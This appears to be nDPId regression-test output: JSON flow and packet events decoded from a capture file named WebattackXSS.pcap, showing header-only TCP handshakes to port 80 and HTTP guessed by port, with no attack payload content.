+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1499347400752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347400752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pCxAAD4GIaSsEAABwKgKMt3YAFC0oCr7AAAAAKACchARLgAAAgQFtAQCCAoBOo7XAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1499347400752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347400752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3diBtZGUtKAq\/KAScSCakQAAAgQFtAQCCAoD5GBNATqO1wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3610,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1499347400753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347400753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pC1AAD4GIausEAABwKgKMt3YAFC0oCr8gbWRlYAQAOU5mAAAAQEICgE6jtgD5GBN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347403327,"flow_last_seen":1499347403327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347403327,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1499347403327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347403327,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89cJAAD4G0A2sEAABwKgKMt3yAFCprWSZAAAAAKACchDf5AAAAgQFtAQCCAoBOpFbAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1499347403327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347403327,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3fKtl6seqa1kmqAScSAhWAAAAgQFtAQCCAoD5GLRATqRWwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1499347403328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347403328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09cNAAD4G0BSsEAABwKgKMt3yAFCprWSarZerH4AQAOXAXwAAAQEICgE6kVsD5GLR"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347404575,"flow_last_seen":1499347404575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1499347404575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347404575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871lAAD4G1nasEAABwKgKMt4AAFBz\/X3KAAAAAKACchD7HQAAAgQFtAQCCAoBOpKTAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1499347404575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347404575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3gCf5c\/zc\/19y6AScSAkNgAAAgQFtAQCCAoD5GQJATqSkwEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1499347404576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347404576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071pAAD4G1n2sEAABwKgKMt4AAFBz\/X3Ln+XP9IAQAOXDPQAAAQEICgE6kpMD5GQJ"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347276278,"flow_last_seen":1499347281695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347277521,"flow_last_seen":1499347282696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347404726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347407100,"flow_last_seen":1499347407100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347407100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1499347407100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347407100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oV1AAD4GJHOsEAABwKgKMt4aAFCK7TRXAAAAAKACchArEAAAAgQFtAQCCAoBOpUKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1499347407100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347407100,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3hoI+EKiiu00WKAScSB18AAAAgQFtAQCCAoD5GaAATqVCgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1499347407101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347407101,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oV5AAD4GJHqsEAABwKgKMt4aAFCK7TRYCPhCo4AQAOUU9wAAAQEICgE6lQsD5GaA"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347408367,"flow_last_seen":1499347408367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347408367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1499347408367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347408367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lz9AAD4GLpGsEAABwKgKMt4oAFBdawF4AAAAAKACchCKJgAAAgQFtAQCCAoBOpZHAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1499347408367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347408367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3igaCcJ\/XWsBeaAScSBC2wAAAgQFtAQCCAoD5Ge9ATqWRwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1499347408368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347408368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l0BAAD4GLpisEAABwKgKMt4oAFBdawF5GgnCgIAQAOXh4gAAAQEICgE6lkcD5Ge9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347409644,"flow_last_seen":1499347409644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347409644,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1499347409644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347409644,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tAhAAD4GEcisEAABwKgKMt42AFAiiCOOAAAAAKACchChpgAAAgQFtAQCCAoBOpeGAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3681,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1499347409644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347409644,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ja0TSQNIogjj6AScSBdSgAAAgQFtAQCCAoD5Gj8ATqXhgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3682,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1499347409645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347409645,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tAlAAD4GEc+sEAABwKgKMt42AFAiiCOPtE0kDoAQAOX8UAAAAQEICgE6l4cD5Gj8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347412160,"flow_last_seen":1499347412160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347412160,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1499347412160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347412160,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VIxAAD4GcUSsEAABwKgKMt5QAFAbQM13AAAAAKACchD8dQAAAgQFtAQCCAoBOpn7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1499347412160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347412160,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3lBjDHLSG0DNeKAScSC4IAAAAgQFtAQCCAoD5GtxATqZ+wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1499347412161,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347412161,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VI1AAD4GcUusEAABwKgKMt5QAFAbQM14Ywxy04AQAOVXJwAAAQEICgE6mfwD5Gtx"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347413405,"flow_last_seen":1499347413405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347413405,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1499347413405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347413405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g\/NAAD4GQd2sEAABwKgKMt5eAFDJGhjAAAAAAKACchACDQAAAgQFtAQCCAoBOpszAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1499347413405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347413405,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3l7I3\/YFyRoYwaAScSDTeQAAAgQFtAQCCAoD5GyoATqbMwEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1499347413405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347413405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0g\/RAAD4GQeSsEAABwKgKMt5eAFDJGhjByN\/2BoAQAOVygQAAAQEICgE6mzMD5Gyo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347414709,"flow_last_seen":1499347414709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1499347414709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347414709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LQhAAD4GmMisEAABwKgKMt5sAFBxqrFxAAAAAKACchC\/dwAAAgQFtAQCCAoBOpx5AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1499347414710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347414710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3mzO8Ll1caqxcqAScSDGHAAAAgQFtAQCCAoD5G3vATqceQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3725,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1499347414710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347414710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LQlAAD4GmM+sEAABwKgKMt5sAFBxqrFyzvC5doAQAOVlJAAAAQEICgE6nHkD5G3v"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
